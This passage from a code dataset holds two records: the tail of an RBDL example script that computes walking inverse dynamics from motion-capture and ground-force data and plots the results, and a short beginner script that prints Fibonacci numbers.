In this case torque muscles\nmodel = rbdl.loadModel(\"gait912.lua\", kwargs={\"floating_base\":True,\"verbose\":True})\nprint(\"DoF: \", model.q_size)\nq_size = model.q_size\nqdot_size = model.qdot_size\n\n#Read in the experimental data\nqVIn = genfromtxt(\"qIK.csv\",delimiter=\",\") \n#Column 0: is time\n#Columns 1 ,..., N: correspond to q0, ..., qN\n\nfVIn = genfromtxt(\"grf.ff\", delimiter=\",\") #0th column is time\n#Column 0: is time\n#Columns 1, 2, 3: Right foot: CoP \n#Columns 4, 5, 6: Right foot: Ground Forces \n#Columns 7, 8, 9: Right foot: Ground torques (zero)\n#Columns 10,11,12: Left foot : CoP \n#Columns 13,14,15: Left foot : Ground Forces \n#Columns 16,17,18: Left foot : Ground torques (zero)\n\n\nfVInShape=fVIn.shape\nprint(fVInShape)\ntimeSpan = np.max(qVIn[:,0])-np.min(qVIn[:,0])\nn = int(np.round(timeSpan*resampleFrequency))\n\n#Take numerical derivatives of q to get estimates qDot (generalized velocities)\n#and qDDot (generalized accelerations)\nfV = np.zeros(shape=(n,fVInShape[1]-1),dtype=float)\ntimeV = np.zeros(shape=(n,1),dtype=float)\nqV = np.zeros(shape=(n,q_size),dtype=float)\nqDotV = np.zeros(shape=(n,q_size),dtype=float)\nqDDotV = np.zeros(shape=(n,q_size),dtype=float)\ntauV = np.zeros(shape=(n,q_size),dtype=float)\n\n#3a. The force and mocap data are interpolated to have a common sense of time.\nfor i in range(0,n):\n timeV[i,0] = (i/(n-1))*timeSpan\n for j in range(0,model.q_size):\n qV[i,j] = np.interp(timeV[i,0],qVIn[:,0],qVIn[:,j+1])\n for j in range(0,fVInShape[1]-1):\n fV[i,j] = np.interp(timeV[i,0],fVIn[:,0],fVIn[:,j+1])\n\n\n#3b. The q's are filtered using a low-pass 2nd order Butterworth filter \n# (signal.butter) applied in the forwards and then backwards directions \n# (filtfilt) so that no phase error is introduced\n\nfreq = resampleFrequency\nwn = freq*0.5;\n\nb,a=signal.butter(2, filterFreq/wn, btype='low',analog=False,output='ba')\n\n\nfor i in range(0,model.q_size):\n qV[:,i]=signal.filtfilt(b,a,qV[:,i])\n #scipy complains about this form of indexing. I'm not sure how\n #to fix this.\n\n#3e. The values for qdot and qddot are formed using numerical derivatives\nfor i in range(0,model.q_size):\n qDotV[:,i] = np.gradient(qV[:,i],timeV[:,0])\n\nfor i in range(0,model.q_size):\n qDDotV[:,i] = np.gradient(qDotV[:,i],timeV[:,0])\n\n\n#Now we're ready to perform the inverse-dynamics analysis\n\n#Working variables used to transform the recorded center-of-pressure (cop)\n#and ground force recordings (grf) into a wrench resolved in the ROOT frame\ncopR = np.zeros(shape=(3),dtype=float)\ngrfR = np.zeros(shape=(3),dtype=float)\ntqR = np.zeros(shape=(3),dtype=float)\ncopL = np.zeros(shape=(3),dtype=float)\ngrfL = np.zeros(shape=(3),dtype=float)\ntqL = np.zeros(shape=(3),dtype=float)\nfextR = np.zeros(shape=(6),dtype=float)\nfextL = np.zeros(shape=(6),dtype=float)\n\nq = np.zeros(shape=(q_size), dtype=float)\nqd = np.zeros(shape=(qdot_size),dtype=float)\nqdd = np.zeros(shape=(qdot_size),dtype=float)\ntau = np.zeros(shape=(qdot_size),dtype=float)\n#for i in range(0,n):\nidRightFoot = model.GetBodyId(\"Foot_R\")\nidLeftFoot = model.GetBodyId(\"Foot_L\")\nnBodies = len(model.mBodies)\nfext = np.zeros(shape=(nBodies,6),dtype=float)\n\n\n\nfor i in range(0,n):\n #3f. 
The ground forces are resolved into wrenches in the ROOT frame \n #Right foot: resolve cop & grf into a wrench in the ROOT frame\n for j in range(0,3): \n copR[j]=fV[i,j] \n grfR[j]=fV[i,j+3]\n tqR=np.cross(np.transpose(copR),np.transpose(grfR))\n for j in range(0,3):\n fextR[j ] = tqR[j]\n fextR[j+3] = grfR[j]\n for j in range(0,3):\n copL[j]=fV[i,j+9]\n grfL[j]=fV[i,j+12]\n tqL=np.cross(np.transpose(copL),np.transpose(grfL))\n for j in range(0,3):\n fextL[j ]= tqL[j]\n fextL[j+3]= grfL[j]\n #3g. The foot wrenches are applied to the appropriate id for each foot\n # see above for the command to get idRightFoot and idLeftFoot\n for j in range(0,6):\n fext[idRightFoot,j] = fextR[j]\n fext[idLeftFoot,j] = fextL[j]\n for j in range(0,q_size):\n q[j]=qV[i,j]\n for j in range(0,qdot_size):\n qd[j]=qDotV[i,j]\n qdd[j]=qDDotV[i,j]\n #3h. The inverse dynamics function in RBDL is called\n rbdl.InverseDynamics(model, q,qd,qdd,tau,fext)\n #3i. The generalized force vector tau is copied to a matrix\n for j in range(0,qdot_size):\n tauV[i,j]=tau[j]\n\n\n#3j. Plots are generated of the input and output data \nif (plotInputData == True):\n i=0\n m=int(np.ceil(np.sqrt(model.q_size)))\n plt.rc('font',family='serif')\n plt.figure(figsize=(8,8))\n for i in range(0,model.q_size):\n plt.subplot(m,m,i+1)\n plt.plot(qVIn[:,0],qVIn[:,i+1],'m')\n plt.plot(timeV,qV[:,i],'k') \n plt.xlabel('Time (s)')\n plt.title('Q'+str(i))\n plt.tight_layout()\n plt.grid(True)\n plt.box(False)\n plt.figure(figsize=(8,8))\n for i in range(0,model.q_size):\n plt.subplot(m,m,i+1)\n plt.plot(timeV,qDotV[:,i],'b')\n plt.xlabel('Time (s)')\n plt.title('QDot'+str(i))\n plt.tight_layout()\n plt.grid(True) \n plt.box(False)\n plt.figure(figsize=(8,8))\n for i in range(0,model.q_size):\n plt.subplot(m,m,i+1)\n plt.plot(timeV,qDDotV[:,i],'r') \n plt.xlabel('Time (s)')\n plt.title('QDDot'+str(i))\n plt.tight_layout()\n plt.grid(True) \n plt.box(False)\n #Plot the ground forces\n plt.figure(figsize=(8,8))\n plt.subplot(2,1,1)\n plt.plot(timeV,fV[:,3],'b')\n plt.plot(timeV,fV[:,5],'c') \n plt.xlabel('Time (s)')\n plt.title('Right Foot Ground Forces')\n plt.tight_layout()\n plt.grid(True) \n plt.box(False)\n plt.subplot(2,1,2)\n plt.plot(timeV,fV[:,12],'b')\n plt.plot(timeV,fV[:,14],'c') \n plt.xlabel('Time (s)')\n plt.title('Left Foot Ground Forces')\n plt.tight_layout()\n plt.grid(True) \n plt.box(False)\n \n\n#Plot the generalized forces\nif(plotOutput==True):\n #Plot the computed generalized forces\n i=0\n m=int(np.ceil(np.sqrt(model.q_size)))\n plt.rc('font',family='serif')\n plt.figure(figsize=(8,8))\n for i in range(0,model.q_size):\n plt.subplot(m,m,i+1)\n plt.plot(timeV,tauV[:,i],'g')\n plt.xlabel('Time (s)')\n plt.title('Tau'+str(i))\n plt.tight_layout()\n plt.grid(True)\n plt.box(False)\n\nif(plotOutput==True or plotInputData == True):\n plt.show()","repo_name":"rbdl/rbdl","sub_path":"examples/walkingInverseDynamicsWithPython/processInverseDynamics.py","file_name":"processInverseDynamics.py","file_ext":"py","file_size_in_byte":6974,"program_lang":"python","lang":"en","doc_type":"code","stars":464,"dataset":"github-code","pt":"94"} +{"seq_id":"31763422919","text":"n = int(input('Enter a number: '))\n\nfib_1 = 0\nfib_2 = 1\n\nprint(f'\\nFibonacci Sequence to {n} terms:')\nprint(fib_1)\nprint(fib_2)\n# range(3, n + 1) so that exactly n terms are printed in total\nfor i in range(3, n + 1):\n fib_i = fib_1 + fib_2\n fib_1 = fib_2\n fib_2 = fib_i\n print(fib_i)\n 
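\n# A hedged sketch (illustrative, not part of the original script): the same\n# iteration packaged as a reusable function returning the first n terms;\n# 'fibonacci_terms' is a hypothetical name.\n#\n# def fibonacci_terms(n):\n#     seq = [0, 1]\n#     for _ in range(3, n + 1):\n#         seq.append(seq[-1] + seq[-2])\n#     return seq[:n]\n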
","repo_name":"sanjeetsuhag/python-basics","sub_path":"Assignments/A2-Basics/a2-2.py","file_name":"a2-2.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}